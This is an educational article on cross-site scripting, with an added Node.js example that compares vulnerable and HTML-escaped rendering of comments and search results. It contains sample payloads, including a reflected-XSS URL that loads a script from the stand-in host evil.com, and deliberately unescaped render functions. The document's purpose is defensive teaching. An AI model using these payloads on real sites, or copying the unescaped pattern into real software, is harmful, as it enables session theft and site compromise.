What is XSS injection?

XSS injection (XSS stands for Cross-Site Scripting) works a bit like SQL injection: user-submitted data that was not properly escaped for the context it is inserted into is used to alter the application's behaviour. Instead of altering SQL queries, XSS injection alters the HTML and JavaScript that the server sends to other users' browsers.

For example, an attacker could post the following comment on a vulnerable site:

<script>alert('Your site was hacked!');</script>

When the site displays the comments, it also serves the hacker’s malicious code:

<div class='comment'>
    John Johnson said:
    What a great site! Thank you for this article!
</div>
<div class='comment'>
    CleverHacker said:
    <script>alert('Your site was hacked!');</script>
</div>

In the example above, every visitor to the page would see a popup that says “Your site was hacked”. The alert box is only a proof of concept: the injected script runs in each visitor's browser under the site's own origin, so it can read the page, send requests as the logged-in user, or steal session cookies that are not marked HttpOnly. Far more potent attacks have been used to deface important websites.

It is called persistent or stored XSS when the server stores the malicious code and later serves it to every user who views the page, as in the example above. When the code is injected into a URL parameter (or other request data) that the page reflects back into its response, it is called non-persistent or reflected XSS: only the users who open that crafted URL are affected.

The following example shows how a non-persistent XSS attack is performed. Bob sends Alice the following URL (the browser percent-encodes the special characters when it sends the request, and the server decodes them again):

http://news.org/search/?q=<script src='http://evil.com/hack.js'></script>

Since the page echoes the search query into its HTML without escaping it, Alice's browser parses the <script> tag and loads the malicious JavaScript file from evil.com:

    Showing results for query <script src='http://evil.com/hack.js'></script>

XSS injection is prevented by encoding every piece of user-provided data for the context it is inserted into (HTML body, attribute value, JavaScript string, URL) at the moment it is written into the page, rather than by trying to filter "bad" input on the way in. OWASP's XSS Prevention Cheat Sheet is an excellent guide on securing your applications against XSS.
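The following Node.js example is added here and is not code from the original article: it puts the vulnerable rendering pattern behind both the comment list and the search page beside its hardened form. The payloads are the ones quoted above; the function names, the escapeHtml helper, the sample comments and the containsScriptTag check are mine.

```javascript
// Added example, not from the original article. Function and variable names,
// the sample comments and the crude containsScriptTag check are my own.

// HTML-escape a value for the "HTML body" context. These five characters are
// the ones that can change how the browser parses markup in element content
// (the rule the OWASP XSS Prevention Cheat Sheet gives for that context).
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: user data is concatenated straight into the HTML, exactly like
// the comment list and the search results page in the article.
function renderCommentsVulnerable(comments) {
  return comments
    .map((c) => `<div class='comment'>${c.author} said: ${c.body}</div>`)
    .join("\n");
}

function renderSearchVulnerable(query) {
  return `<p>Showing results for query ${query}</p>`;
}

// Hardened: every user-controlled value is escaped for the HTML body context
// as it is written into the page, so the browser renders it as plain text.
function renderCommentsSafe(comments) {
  return comments
    .map((c) => `<div class='comment'>${escapeHtml(c.author)} said: ${escapeHtml(c.body)}</div>`)
    .join("\n");
}

function renderSearchSafe(query) {
  return `<p>Showing results for query ${escapeHtml(query)}</p>`;
}

// Crude check, only used to show the difference between the two renderers:
// does the output contain a live <script tag? A real test would parse the HTML.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Reflected XSS: the payload travels in the URL. Parsing the URL the way a
// browser does (WHATWG URL) percent-encodes the payload on the way out and
// searchParams decodes it again, which is what the server-side handler sees.
function queryFromUrl(url) {
  return new URL(url).searchParams.get("q") ?? "";
}

// Constructed sample data using the payloads from the article.
const sampleComments = [
  { author: "John Johnson", body: "What a great site! Thank you for this article!" },
  { author: "CleverHacker", body: "<script>alert('Your site was hacked!');</script>" },
];
const sampleUrl = "http://news.org/search/?q=<script src='http://evil.com/hack.js'></script>";

// Stored XSS: the vulnerable renderer ships the script, the safe one does not.
console.log("vulnerable comments:\n" + renderCommentsVulnerable(sampleComments));
console.log("safe comments:\n" + renderCommentsSafe(sampleComments));

// Reflected XSS: same story for the search query taken from the URL.
const q = queryFromUrl(sampleUrl);
console.log("vulnerable search: " + renderSearchVulnerable(q));
console.log("safe search:       " + renderSearchSafe(q));
```

The escaped output still shows the attacker's text verbatim on the page; it simply no longer executes, which is the goal. Escaping is context-specific: the same helper is not sufficient for a value placed inside a JavaScript string, a URL or an unquoted attribute, which is why the OWASP guide has one rule per context.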
